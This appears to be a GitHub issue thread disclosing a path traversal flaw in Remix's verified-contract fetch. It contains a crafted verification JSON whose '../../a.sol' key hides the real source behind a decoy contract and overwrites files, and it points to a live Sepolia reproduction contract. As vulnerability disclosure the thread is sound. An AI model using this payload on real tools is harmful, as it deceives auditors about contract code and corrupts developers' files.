Path Travel Issue in Verified Contract Fetch Process in Contract Verification Tool

[Hellobloc]

Path Traversal Issue in Remix Online Contract Verification Tool.

Introduction

A path traversal Issue (../ file path issue) has been discovered in Remix Contract Verification Tool. This Issue allows attackers to shift verification paths to upper directories, thereby hiding specific real contract source files and modify the other files in remix. This results in a source code forgery Issue potentially enabling attackers to deceive users and auditors during contract verification and may impact the developer who use remix to develop their contract when they use Contract Verification Tool.
By constructing a specially crafted JSON file for source code verification, an attacker can exploit flaws in Remix's directory handling mechanism. This causes the actual source file ../../a.sol to be overwritten and hidden while displaying the fake malicious source files in the directory. and other bad files would overwrite the users' source code in remix

Example JSON

Below is an example JSON file demonstrating the Issue:

{
    "language": "Solidity",
    "sources": {
        "a.sol": {
            "content": "// SPDX-License-Identifier: GPL-3.0

            pragma solidity >=0.7.0 <0.9.0;

            contract Owner {
                address private Hacker;
                function bad(address newOwner) public {
                    Hacker = address(0x0);
                }
            }"
        },
        "../../a.sol": {
            "content": "// SPDX-License-Identifier: GPL-3.0

            pragma solidity >=0.7.0 <0.9.0;

            contract Owner {
                address private owner;
                function changeOwner(address newOwner) public {
                    owner = newOwner;
                }
            }"
        }
    },
    "settings": {}
}

By submitting this crafted JSON file, the actual source file ../../a.sol is concealed, while the fake file a.sol with malicious code is displayed in the directory. in the mean time, the other attack code would also overwrited the other file in remix.

Below are links illustrating the exploitation:

https://sepolia.etherscan.deth.net/address/0xb7e278f0116508c611f8a486666d3823e51c44dc

Recommendations

• Implement strict path sanitization to prevent the use of ../ for directory traversal.

We also find same issue in Forge, Metasuite, Blockscan and crytic-based tools like Slither. so this is a common issue for code fetcher tool but we also think this is a risky issue need to did some better pratice.

Thank you very much for providing such a powerful tool, it's a great convenience for us and hopefully this discovery will allow me to contribute something to the tool.

[Hellobloc]

[Hellobloc]

@yann300 @joeizang @bunsenstraat

[Aniket-Engg]

Hello @Hellobloc Remix usually handles path traversing strictly. Were you able to reproduce it successfully with Remix IDE?

[Hellobloc]

Isn’t the above picture a reproduction case? The path traversal here comes from the process of fetching the source code. By accessing the contract(sepolia - 0xb7e278f0116508c611f8a486666d3823e51c44dc) source code of this address, you can reproduce.

When I verify 0xb7e278f0116508c611f8a486666d3823e51c44dc, I set the paths of some source codes in this contract source code to ../../../a.sol

[Hellobloc]

In addition to this issue, I think this issue should be taken seriously.

#6106

[Hellobloc]

@Aniket-Engg

[joeizang]

@Hellobloc Hi. Can you provide a loom video of how to reproduce this? We are taking this very seriously and would like to understand your findings are much as we can. Kindly provide a loom video (short 2 or 3 minute video). Thanks.

[Hellobloc]

I don't understand. Isn't the picture obvious? If you access a malicious verified source code in etherscan, there will be path traversal leading to the writing of any file. I also provided a malicious source address I constructed?I can provide the video later, but please make sure you understand this question firstly.Because I think it's easy to reproduct in your place.

[joeizang]

Thanks @Hellobloc

[Hellobloc]

meeting_01.mp4